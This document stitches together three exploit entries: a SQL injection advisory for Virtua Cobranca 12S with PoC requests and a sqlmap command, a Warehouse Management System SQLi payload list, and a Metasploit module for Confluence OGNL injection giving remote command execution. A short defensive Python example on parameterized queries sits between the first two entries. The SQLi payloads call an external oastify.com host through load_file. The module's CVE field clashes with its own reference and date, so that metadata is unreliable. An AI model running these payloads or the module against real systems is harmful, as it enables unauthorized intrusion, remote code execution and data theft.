<pre><code># Exploit Title: Virtua Software Cobranca 12S - SQLi
# Shodan Query: http.favicon.hash:876876147
# Date: 13/08/2021
# Exploit Author: Luca Regne
# Vendor Homepage: https://www.virtuasoftware.com.br/
# Software Link: https://www.virtuasoftware.com.br/downloads/Cobranca12S_13_08.exe
# Version: 12S
# Tested on: Windows Server 2019
# CVE : CVE-2021-37589
------------------------------------------------------------------------


## Description
A blind SQL injection vulnerability in the login page (/controller/login.php) of Virtua Cobranca 12S allows remote unauthenticated attackers to extract information from the application by executing arbitrary SQL commands through the idusuario parameter.

## Request PoC
```
POST /controller/login.php?acao=autenticar HTTP/1.1
Host: redacted.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:90.0) Gecko/20100101 Firefox/90.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 37
Connection: close
Cookie: origem_selecionado=; PHPSESSID=

idusuario='&idsenha=awesome_and_unprobaly_password&tipousr=Usuario

```

This request causes an HTTP 500 error. Changing idusuario to "'+AND+'1'%3d'1'--" instead yields a 200 status code with an authentication-error message, which shows that the injected condition is evaluated by the database.

```
POST /controller/login.php?acao=autenticar HTTP/1.1
Host: redacted.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:90.0) Gecko/20100101 Firefox/90.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 37
Connection: close
Cookie: origem_selecionado=; PHPSESSID=

idusuario='+AND+'1'='1'--&idsenha=a&tipousr=Usuario

```

## Exploit
Save the request from Burp to a file, then point sqlmap at the idusuario parameter:
```bash
python3 sqlmap.py -r ~/req-virtua.txt -p idusuario --dbms firebird --level 5 --risk 3 --random-agent
```

</code></pre>
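The 500-then-200 behaviour described above is the signature of a query assembled by string concatenation: a lone quote breaks the statement, while a syntactically valid injected condition is accepted and evaluated. The following is an added example, not code from the advisory or from Virtua Software, that reproduces the two observations against a hypothetical string-built login query and shows the hardened, parameterized form that removes the defect. sqlite3 stands in for the Firebird backend (the sqlmap command targets Firebird) purely so the example runs offline; the table, column and row are constructed.

```python
import sqlite3

# Constructed stand-in for the application's user table. sqlite3 replaces the
# Firebird backend only so the example runs offline. Column names mirror the
# form fields in the PoC request (idusuario, idsenha, tipousr).
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE usuarios (idusuario TEXT, idsenha TEXT, tipousr TEXT)")
    conn.execute("INSERT INTO usuarios VALUES ('admin', 'constructed-secret', 'Usuario')")
    conn.commit()
    return conn


def login_string_built(conn, idusuario, idsenha):
    """Hypothetical sketch of a query assembled by string formatting.

    Returns (status, message): "500" when the database rejects the statement,
    "200" otherwise, matching what the advisory observes for the two PoC inputs.
    """
    sql = ("SELECT idusuario FROM usuarios "
           "WHERE idusuario = '%s' AND idsenha = '%s'" % (idusuario, idsenha))
    try:
        row = conn.execute(sql).fetchone()
    except sqlite3.OperationalError:
        return ("500", "database error")  # a lone quote leaves the statement unparseable
    return ("200", "ok" if row else "authentication error")


def login_parameterized(conn, idusuario, idsenha):
    """Hardened form: placeholders keep the input as data, never as SQL text."""
    sql = "SELECT idusuario FROM usuarios WHERE idusuario = ? AND idsenha = ?"
    row = conn.execute(sql, (idusuario, idsenha)).fetchone()
    return ("200", "ok" if row else "authentication error")


# The two idusuario values from the advisory, URL-decoded.
PROBE_QUOTE = "'"
PROBE_TAUTOLOGY = "' AND '1'='1'--"


def compare():
    """Run both probe inputs through both query styles and return the outcomes."""
    conn = make_db()
    return {
        "string_built": {
            "quote": login_string_built(conn, PROBE_QUOTE, "a"),
            "tautology": login_string_built(conn, PROBE_TAUTOLOGY, "a"),
        },
        "parameterized": {
            "quote": login_parameterized(conn, PROBE_QUOTE, "a"),
            "tautology": login_parameterized(conn, PROBE_TAUTOLOGY, "a"),
            "valid": login_parameterized(conn, "admin", "constructed-secret"),
        },
    }


if __name__ == "__main__":
    for variant, results in compare().items():
        for probe, (status, msg) in results.items():
            print(f"{variant:14} {probe:10} -> {status} {msg}")
```

The string-built version answers 500 to the quote and 200 to the tautology, exactly the pair of responses the advisory uses as its indicator; the parameterized version answers 200 "authentication error" to both, because neither input ever reaches the SQL parser as syntax. For a PHP application on Firebird the equivalent is a prepared statement with bound parameters (PDO or the ibase_* prepare/execute pair), and the same fix applies to every other parameter the login handler interpolates.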
<pre><code>## Title: Warehouse Management System 2022 ML-SQLi
## Author: nu11secur1ty
## Date: 06.13.2022
## Vendor: https://www.sourcecodester.com/users/tips23
## Software: https://www.sourcecodester.com/php-codeigniter-warehouse-management-system-free-source-code
## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2022/Warehouse-Management-System


## Description:
Multiple SQL injection vulnerabilities exist in Warehouse Management System 2022 by oretnom23.
An attacker can retrieve all information from this system by using
this vulnerability.

Status: TURBO CRITICAL

[+] Payloads:

```mysql
---
Parameter: cari (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT)
    Payload: cari=(select load_file('\\\\f4klvq2zr2jjq1fqicjzdovoifo8c3hr8twljb70.oastify.com\\qxv')) OR NOT 4744=4744# IltN&kirim=

    Type: error-based
    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: cari=(select load_file('\\\\f4klvq2zr2jjq1fqicjzdovoifo8c3hr8twljb70.oastify.com\\qxv')) OR (SELECT 9682 FROM(SELECT COUNT(*),CONCAT(0x71627a6a71,(SELECT (ELT(9682=9682,1))),0x717a626a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)# mXqR&kirim=

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: cari=(select load_file('\\\\f4klvq2zr2jjq1fqicjzdovoifo8c3hr8twljb70.oastify.com\\qxv')) AND (SELECT 7785 FROM (SELECT(SLEEP(5)))LDxo)# ZbKb&kirim=

    Type: UNION query
    Title: MySQL UNION query (NULL) - 9 columns
    Payload: cari=-5568 UNION ALL SELECT CONCAT(0x71627a6a71,0x4856564e4357704e696c6b4648505a656a744575445967544a494d5075566b5a4d466c7976516869,0x717a626a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#&kirim=
---
```

## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2022/Warehouse-Management-System)

## Proof and Exploit:
[href](https://streamable.com/ef58wt)


</code></pre>
<pre><code>##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote

  Rank = ExcellentRanking

  prepend Msf::Exploit::Remote::AutoCheck
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Atlassian Confluence Namespace OGNL Injection',
        'Description' => %q{
          This module exploits an OGNL injection in Atlassian Confluence servers. A specially crafted URI can be used to
          evaluate an OGNL expression resulting in OS command execution.
        },
        'Author' => [
          'Unknown', # exploited in the wild
          'bturner-r7',
          'jbaines-r7',
          'Spencer McIntyre'
        ],
        'References' => [
          ['CVE', '2021-26084'],
          ['URL', 'https://jira.atlassian.com/browse/CONFSERVER-79000?src=confmacro'],
          ['URL', 'https://gist.githubusercontent.com/bturner-r7/1d0b62fac85235b94f1c95cc4c03fcf3/raw/478e53b6f68b5150eefd53e0956f23d53618d250/confluence-exploit.py'],
          ['URL', 'https://github.com/jbaines-r7/through_the_wire'],
          ['URL', 'https://attackerkb.com/topics/BH1D56ZEhs/cve-2022-26134/rapid7-analysis']
        ],
        'DisclosureDate' => '2022-06-02',
        'License' => MSF_LICENSE,
        'Platform' => ['unix', 'linux'],
        'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
        'Privileged' => false,
        'Targets' => [
          [
            'Unix Command',
            {
              'Platform' => 'unix',
              'Arch' => ARCH_CMD,
              'Type' => :cmd
            }
          ],
          [
            'Linux Dropper',
            {
              'Platform' => 'linux',
              'Arch' => [ARCH_X86, ARCH_X64],
              'Type' => :dropper
            }
          ]
        ],
        'DefaultTarget' => 0,
        'DefaultOptions' => {
          'RPORT' => 8090
        },
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
        }
      )
    )

    register_options([
      OptString.new('TARGETURI', [true, 'Base path', '/'])
    ])
  end

  def check
    version = get_confluence_version
    return CheckCode::Unknown unless version

    vprint_status("Detected Confluence version: #{version}")
    header = "X-#{Rex::Text.rand_text_alphanumeric(10..15)}"
    res = inject_ognl('', header: header) # empty command works for testing, the header will be set

    return CheckCode::Unknown unless res

    unless res && res.headers.include?(header)
      return CheckCode::Safe('Failed to test OGNL injection.')
    end

    CheckCode::Vulnerable('Successfully tested OGNL injection.')
  end

  def get_confluence_version
    return @confluence_version if @confluence_version

    res = send_request_cgi(
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, 'login.action')
    )
    return nil unless res&.code == 200

    poweredby = res.get_xml_document.xpath('//ul[@id="poweredby"]/li[@class="print-only"]/text()').first&.text
    return nil unless poweredby =~ /Confluence (\d+(\.\d+)*)/

    @confluence_version = Rex::Version.new(Regexp.last_match(1))
    @confluence_version
  end

  def exploit
    print_status("Executing #{payload_instance.refname} (#{target.name})")

    case target['Type']
    when :cmd
      execute_command(payload.encoded)
    when :dropper
      execute_cmdstager
    end
  end

  def execute_command(cmd, _opts = {})
    header = "X-#{Rex::Text.rand_text_alphanumeric(10..15)}"
    res = inject_ognl(cmd, header: header)

    unless res && res.headers.include?(header)
      fail_with(Failure::PayloadFailed, "Failed to execute command: #{cmd}")
    end

    vprint_good("Successfully executed command: #{cmd}")
    res.headers[header]
  end

  def inject_ognl(cmd, header:)
    send_request_cgi(
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, Rex::Text.uri_encode(ognl_payload(cmd, header: header)), 'dashboard.action'),
      'headers' => { header => cmd }
    )
  end

  def ognl_payload(_cmd, header:)
    <<~OGNL.gsub(/^\s+/, '').tr("\n", '')
      ${
        Class.forName("com.opensymphony.webwork.ServletActionContext")
          .getMethod("getResponse",null)
          .invoke(null,null)
          .setHeader("#{header}",
            Class.forName("javax.script.ScriptEngineManager")
              .newInstance()
              .getEngineByName("js")
              .eval("java.lang.Runtime.getRuntime().exec([
                #{target['Platform'] == 'win' ? "'cmd.exe','/c'" : "'/bin/sh','-c'"},
                com.opensymphony.webwork.ServletActionContext.getRequest().getHeader('#{header}')
              ]); '#{Faker::Internet.uuid}'")
          )
      }
    OGNL
  end
end
</code></pre>